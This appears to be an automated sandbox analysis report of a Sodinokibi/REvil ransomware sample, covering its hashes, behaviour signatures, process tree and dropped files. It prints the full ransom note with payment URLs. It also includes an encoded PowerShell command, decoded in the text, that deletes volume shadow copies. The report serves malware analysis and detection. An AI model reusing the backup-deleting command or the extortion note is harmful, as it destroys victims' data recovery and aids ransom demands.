Resubmissions

  • 18-09-2024 11:32  240918-nnmz7azakp  10
  • 15-09-2024 12:50  240915-p21c4svflm  10
  • 15-09-2024 12:44  240915-pysh4atflf  10
  • 15-09-2024 12:04  240915-n83ldatdpl  10

Analysis

  • max time kernel
    89s
  • max time network
    92s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    15-09-2024 12:44

General

  • Target
    e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
  • Size
    165KB
  • MD5
    e2708d3c57b562b01da42f9e7549781f
  • SHA1
    3d82951dbfab5629187b26ecb7388b7a05597f67
  • SHA256
    d976a41f366fb1e3a0a5d15878d84e24704949973d9e0ccead9a779dee03ef0f
  • SHA512
    c483968f981e64021025bf4f42424df3cfb88a55bd4cb7f2aa904515eccb85e239c3d44812b28d5b617b6b8476dcc3f4258465a211ae6e6725adbf1850234619
  • SSDEEP
    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/NaxohzDKMlt:lw02sJPi7O93N3FHlt

Malware Config

Extracted

  • Path
    C:\Users\82iq912j-readme.txt
  • Family
    sodinokibi
  • Ransom Note
---=== Welcome. CDHFUND. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 82iq912j. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:
1) [Recommended] Using a TOR browser!
   a) Download and install TOR browser from this site: https://torproject.org/
   b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/172B6E645B562FA8
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
   a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
   b) Open our secondary website: http://decryptor.top/172B6E645B562FA8
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key: [per-victim base64 key blob omitted]
Extension name: 82iq912j
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/172B6E645B562FA8

http://decryptor.top/172B6E645B562FA8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 32 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e2708d3c57b562b01da42f9e7549781f_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of all volume shadow copies, which is the observable behind the "Uses Volume Shadow Copy service COM API" signature)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4120
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:2240
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2076
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:232
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\StepPing.doc.82iq912j"
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Checks processor information in registry
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3812
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CFD4CCF2226F063364C984852228E8F0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CFD4CCF2226F063364C984852228E8F0 --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2620
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4FCD6BCE4822214D57ECED2F0DF756C4 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:784
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:3128
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\82iq912j-readme.txt
    1⤵
    PID:3124
  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\StepPing.doc" /o ""
    1⤵
    • System Network Configuration Discovery: Internet Connection Discovery
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3824

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\82iq912j-readme.txt
    Filesize 6KB
    MD5 78bcd40188b3f2e60e93729fa39e1c48
    SHA1 52ec776bf3a56943becd0f62910094ecee56c54b
    SHA256 01d27333f399724364a0ab07b62ae55c80fa571a3375319923be510e1832db78
    SHA512 4044459fd1ea78c15f6d403a3d801def90f1def9313ef64b617e7040434fac182849a4bd8403c8c1f7d120a6e9f0159d91d71eb1d27402087a97be69b5cdcc91

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uz1dm1wt.b14.ps1
    Filesize 60B
    MD5 d17fe0a3f47be24a6453e9ef58c94641
    SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Filesize 297B
    MD5 8c82574bf7a165bb658a3c55bc8a7507
    SHA1 7a799afcea818d9e37b07f88630a2f43aee90d34
    SHA256 9dab31f52510b4ba7ae5e9fff64f2448ffae69f0eba46288d580dffed71490bc
    SHA512 e0a21e95aee133f7ae5a5e31166c1e66d2535388d687ec8b0ad030e66c3fcdbc78ae6c9728795cc6b898dd37b1fc281698aca277a23769ef892fa620ab9a190d

  • C:\Users\Admin\Documents\StepPing.doc.82iq912j
    Filesize 482KB
    MD5 ad719d0af662079f39898bc989a58b7b
    SHA1 649a3f82dd904ebb39052ce03baa4f84bcb181f3
    SHA256 6917ce0cf2f1d3a6c8e25e1b67ca249f72b2f1eb5084e15dcc450a08db7cd716
    SHA512 be1c0867d0dbdee68802bde252a11dc67c3362f4d039767cf9118099d9ddbe8a0265e5a64966f73b76f5edef822ffa285a7586496d76acb98b912b19680c4c58

  • memory/3824-458-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp
    Filesize 64KB
  • memory/3824-456-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp
    Filesize 64KB
  • memory/3824-459-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp
    Filesize 64KB
  • memory/3824-460-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp
    Filesize 64KB
  • memory/3824-457-0x00007FF8302B0000-0x00007FF8302C0000-memory.dmp
    Filesize 64KB
  • memory/3824-461-0x00007FF82D830000-0x00007FF82D840000-memory.dmp
    Filesize 64KB
  • memory/3824-462-0x00007FF82D830000-0x00007FF82D840000-memory.dmp
    Filesize 64KB
  • memory/4120-12-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp
    Filesize 10.8MB
  • memory/4120-15-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp
    Filesize 10.8MB
  • memory/4120-11-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp
    Filesize 10.8MB
  • memory/4120-10-0x00007FF84E510000-0x00007FF84EFD2000-memory.dmp
    Filesize 10.8MB
  • memory/4120-0-0x00007FF84E513000-0x00007FF84E515000-memory.dmp
    Filesize 8KB
  • memory/4120-1-0x000001F1A7D80000-0x000001F1A7DA2000-memory.dmp
    Filesize 136KB